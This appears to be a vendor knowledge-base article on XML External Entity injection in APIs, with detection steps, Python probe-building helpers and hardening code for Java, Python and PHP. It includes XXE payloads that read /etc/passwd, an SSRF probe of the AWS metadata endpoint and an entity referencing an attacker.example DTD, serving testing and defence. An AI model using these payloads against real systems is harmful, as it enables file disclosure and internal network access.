HIGH Input Validation

XML External Entities in APIs

What Is XML External Entity (XXE) Injection?

XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser processes malicious XML input containing external entity references. XML entities are a way to define shortcuts for reuse within XML documents, but when external entities are allowed, attackers can craft payloads that cause the parser to access files, network resources, or other system components outside the intended scope.

The vulnerability stems from how XML processors handle the <!ENTITY> declaration. An external entity reference like <!ENTITY xxe SYSTEM "file:///etc/passwd"> tells the parser to load content from an external source. When the XML is parsed, this can lead to unauthorized file access, server-side request forgery (SSRF), or denial of service through resource exhaustion.

XXE attacks typically exploit three mechanisms: inline DTD (Document Type Definition) declarations, external DTD files, and parameter entities. The most dangerous scenario occurs when applications accept XML input with DTDs enabled and fail to disable external entity resolution, allowing attackers to manipulate the XML processing behavior.
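
The declaration types described above can be made visible without resolving anything. The following is a minimal sketch using the standard-library expat bindings; the function name, the sample document, and the attacker.example URL are illustrative assumptions, and the parser only reports what a DTD declares rather than fetching any external resource.

```python
from xml.parsers import expat


def list_entity_declarations(xml_text):
    """Return (name, kind, target) for each <!ENTITY> declaration in xml_text."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        scope = "parameter" if is_parameter else "general"
        if system_id is not None:
            # External entity: the target is a URI the parser could be asked to load.
            found.append((name, "external " + scope, system_id))
        else:
            # Internal entity: the target is literal replacement text.
            found.append((name, "internal " + scope, value))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


# Hypothetical sample: one internal entity, one external general entity,
# and one external parameter entity, all declared in an inline DTD.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY greeting "hello">
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
]>
<root>&greeting;</root>"""

for declaration in list_entity_declarations(SAMPLE):
    print(declaration)
```

Any entry reported as external is a location that a permissively configured parser may try to read.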

How XML External Entities Affect APIs

APIs that accept XML input are particularly vulnerable to XXE attacks when they use XML parsers without proper security configurations. The impact can be severe across multiple attack vectors:

File Disclosure: Attackers can read sensitive files from the server filesystem using file:// URIs, potentially exposing configuration files, user data, or application source code.
SSRF Attacks: External entity references using http:// or https:// protocols can force the server to make requests to internal network services, cloud metadata endpoints, or external systems, enabling network reconnaissance and data exfiltration.
Denial of Service: Malicious XML can trigger exponential entity expansion (the "billion laughs" attack) or excessive resource consumption through recursive entity references, overwhelming the server.
Port Scanning: By crafting external entities that attempt connections to various ports, attackers can map internal network services and identify potential targets.
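
The arithmetic behind the denial-of-service item above can be sketched as follows. This is an illustration only: the helper names are assumptions, and the code builds the declaration text and computes its expanded size without ever handing it to a parser.

```python
def expanded_size(base_len, levels, fanout):
    """Bytes produced when each of `levels` nested entities references the previous one `fanout` times."""
    return base_len * fanout ** levels


def build_nested_entities(levels, fanout, base="lol"):
    """Build the entity declarations as text only; nothing here parses them."""
    lines = ['<!ENTITY e0 "%s">' % base]
    for i in range(1, levels + 1):
        refs = ("&e%d;" % (i - 1)) * fanout
        lines.append('<!ENTITY e%d "%s">' % (i, refs))
    return "\n".join(lines)


dtd = build_nested_entities(levels=9, fanout=10)
print(len(dtd), "bytes of declarations")
print(expanded_size(3, 9, 10), "bytes after full expansion")
```

A few hundred bytes of declarations expand to roughly three gigabytes, which is why a size limit on the request body alone does not stop this attack.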

In API contexts, XXE vulnerabilities often appear in SOAP endpoints, XML-based configuration uploads, XML-based data exchange formats, and any endpoint that processes XML documents without proper validation. The consequences range from data theft and service disruption to providing attackers with a foothold for deeper network compromise.

How to Detect XML External Entities

Detecting XXE vulnerabilities requires both static analysis of XML processing code and dynamic testing of XML endpoints. Here are the key detection methods:

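Static Analysis: Review XML parser configurations in your codebase. Look for parser initialization code that doesn't explicitly disable DTDs or external entity processing. In Java, check for DocumentBuilderFactory instances that neither enable the http://apache.org/xml/features/disallow-doctype-decl feature nor disable external general and parameter entities; setExpandEntityReferences(false) on its own is not sufficient. In Python, xml.etree.ElementTree does not expand external entities but is still exposed to entity-expansion attacks, xml.sax processed external general entities by default before Python 3.7.1, and lxml parsers should be created with an explicit resolve_entities=False. In PHP, look for the LIBXML_NOENT and LIBXML_DTDLOAD flags, and on versions before 8.0 ensure libxml_disable_entity_loader(true) is called.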
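
As a rough illustration of the Java review step, the sketch below flags source text that creates a DocumentBuilderFactory without mentioning a hardening feature. It is a textual heuristic under stated assumptions (the function name and marker list are hypothetical), so it will miss factories configured in a helper class and should only be used to shortlist files for manual review.

```python
import re

# Matches the JAXP factory creation call.
FACTORY_CALL = re.compile(r"DocumentBuilderFactory\.newInstance\s*\(")

# Feature-name fragments whose presence suggests the factory was hardened.
HARDENING_MARKERS = (
    "disallow-doctype-decl",
    "external-general-entities",
)


def flag_unhardened_factory(java_source):
    """Return True when a factory is created and no hardening feature string appears."""
    if not FACTORY_CALL.search(java_source):
        return False
    return not any(marker in java_source for marker in HARDENING_MARKERS)


risky = "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();"
hardened = risky + '\ndbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);'
print(flag_unhardened_factory(risky), flag_unhardened_factory(hardened))
```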

Dynamic Testing: Send crafted XML payloads to API endpoints that accept XML input. Test with payloads containing external entity references like:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

Monitor for unexpected responses that might indicate successful entity resolution. Also test for SSRF by using http://169.254.169.254/latest/meta-data/ (AWS metadata endpoint) or other internal URLs.
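
The probe above can be generated for different targets with a small helper. This is a sketch, not a scanner: the function names are assumptions, no request is sent, and the passwd-style marker is only one heuristic for spotting a resolved entity in a response body.

```python
from xml.sax.saxutils import quoteattr


def build_xxe_probe(system_id, entity_name="xxe"):
    """Return an XML document whose root element references one external entity."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [ <!ENTITY %s SYSTEM %s> ]>\n"
        "<root>&%s;</root>" % (entity_name, quoteattr(system_id), entity_name)
    )


def response_suggests_file_read(body):
    """Heuristic: a passwd-style root entry in the body hints that the entity was resolved."""
    return "root:x:0:0" in body or "root:*:0:0" in body


print(build_xxe_probe("file:///etc/passwd"))
print(build_xxe_probe("http://169.254.169.254/latest/meta-data/"))
```

Send such payloads only to endpoints you are authorized to test, with the Content-Type the endpoint expects for XML.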

middleBrick Scanning: middleBrick automatically tests for XXE vulnerabilities across all scanned endpoints. The scanner attempts to trigger external entity processing by sending payloads that reference both file system resources and network endpoints. It analyzes responses for signs of successful entity resolution, such as unexpected content in responses or timing differences that suggest network requests were made. The XXE check is part of middleBrick's comprehensive Input Validation assessment, helping you identify vulnerable endpoints without manual testing.

Prevention & Remediation

Preventing XXE vulnerabilities requires secure XML parser configuration and input validation. Here are concrete remediation steps for different platforms:

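Java (JAXP): When creating XML parsers, reject DOCTYPE declarations where possible and explicitly disable external entity processing:

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Strongest setting: refuse any document that contains a DOCTYPE
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth for parsers that must tolerate DTDs
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();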

Python: Use secure parser configurations:

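# The standard-library ElementTree parser has no resolve_entities option
# (that keyword belongs to lxml). defusedxml wraps ElementTree and, by default,
# rejects entity declarations and external references.
import defusedxml.ElementTree as ET
tree = ET.parse(xml_file)

# With lxml instead:
# parser = lxml.etree.XMLParser(resolve_entities=False, no_network=True)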

PHP: Disable external entity loading:

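// Deprecated since PHP 8.0; libxml 2.9.0+ keeps external entities off unless LIBXML_NOENT is passed
if (PHP_VERSION_ID < 80000) { libxml_disable_entity_loader(true); }
// Never pass LIBXML_NOENT or LIBXML_DTDLOAD when parsing untrusted input
$xml = simplexml_load_string($xml_string);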

General Best Practices: Validate all XML input against an expected schema before processing, and reject documents that contain a DOCTYPE when your API does not need one. Use allowlists for XML schemas and document structures. Implement input size limits to reduce exposure to DoS attacks. Consider data formats that don't support external entities, such as JSON, for new API designs. Regularly update XML libraries to ensure you have the latest security patches.
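
A size limit and a DOCTYPE check can be combined in front of the real parser. The sketch below uses only the Python standard library; the 1 MB limit, the exception class, and the function names are assumptions chosen for illustration, and the input is parsed twice, which trades some CPU time for a simple, explicit gate.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

MAX_XML_BYTES = 1_000_000  # assumed limit; tune per endpoint


class RejectedXml(ValueError):
    """Raised when input is too large, malformed, or declares a DTD."""


def _refuse_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees <!DOCTYPE ...>.
    raise RejectedXml("DOCTYPE declarations are not accepted")


def parse_untrusted_xml(data: bytes):
    """Return the root element, or raise RejectedXml before any entity is processed."""
    if len(data) > MAX_XML_BYTES:
        raise RejectedXml("XML body exceeds %d bytes" % MAX_XML_BYTES)
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _refuse_doctype
    try:
        checker.Parse(data, True)
    except expat.ExpatError as exc:
        raise RejectedXml("malformed XML: %s" % exc) from exc
    return ET.fromstring(data)


root = parse_untrusted_xml(b"<order><id>7</id></order>")
print(root.find("id").text)
```

Because entities can only be declared inside a DTD, refusing the DOCTYPE also blocks internal entity expansion attacks, not just external references.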

For APIs that must process XML documents with legitimate DTD requirements, resolve entities only through a custom resolver that allowlists known DTD locations, restrict outbound network access from the service that parses XML, and monitor at runtime for unexpected entity references.

Real-World Impact

XXE vulnerabilities have caused significant security incidents across industries. In 2017, CVE-2017-12629 in Apache Solr combined an XXE flaw in the XML query parser with the Config API's RunExecutableListener, allowing remote attackers to read files and execute code on servers running versions before 7.1. This affected numerous enterprise deployments and required widespread patching.

The OWASP Top 10 listed XXE as its own category (A4) in the 2017 edition and folded it into Security Misconfiguration (A05) in 2021, and real-world exploitation continues to be reported. Attackers have used XXE to bypass authentication mechanisms, exfiltrate sensitive data from corporate networks, and gain initial access for larger attacks. The vulnerability is particularly dangerous because it often stems from permissive defaults in XML processing libraries, making it widespread across applications that use XML.

Financial services, healthcare, and government organizations have all experienced XXE-related incidents, with impacts ranging from data breaches to service outages. The cost of exploitation can include regulatory fines, reputational damage, and the resources required for incident response and remediation. Regular security scanning with tools like middleBrick helps organizations identify and address XXE vulnerabilities before attackers can exploit them.

Frequently Asked Questions

Can XXE attacks happen with JSON APIs?

No, XXE specifically targets XML parsers and their entity resolution mechanisms. JSON doesn't support external entity references or DTDs. However, APIs that accept both XML and JSON formats need to secure the XML processing paths. Some APIs might also have XML processing hidden in their implementation (like XML-based configuration files), so it's important to assess the entire attack surface, not just the API's primary data format.

How does middleBrick detect XXE vulnerabilities differently than other scanners?

middleBrick uses active probing techniques specifically designed to trigger XXE conditions. The scanner sends carefully crafted XML payloads that attempt to resolve both file system entities and network-based entities. It then analyzes response characteristics to determine if external entity resolution occurred. Unlike some scanners that only perform static analysis, middleBrick's black-box approach tests the actual runtime behavior of your API endpoints, providing more accurate results about whether the vulnerability is exploitable in your specific deployment.

Is disabling external entities enough to prevent all XML-based attacks?

Disabling external entities prevents XXE attacks but doesn't address all XML-related vulnerabilities. Other concerns include XML bomb attacks (billion laughs), quadratic blowup attacks, and issues with XML schema validation. You should also implement input size limits, use secure XML parsers with the latest security patches, and consider using safer formats like JSON when possible. A comprehensive XML security strategy includes both configuration hardening and input validation at multiple layers.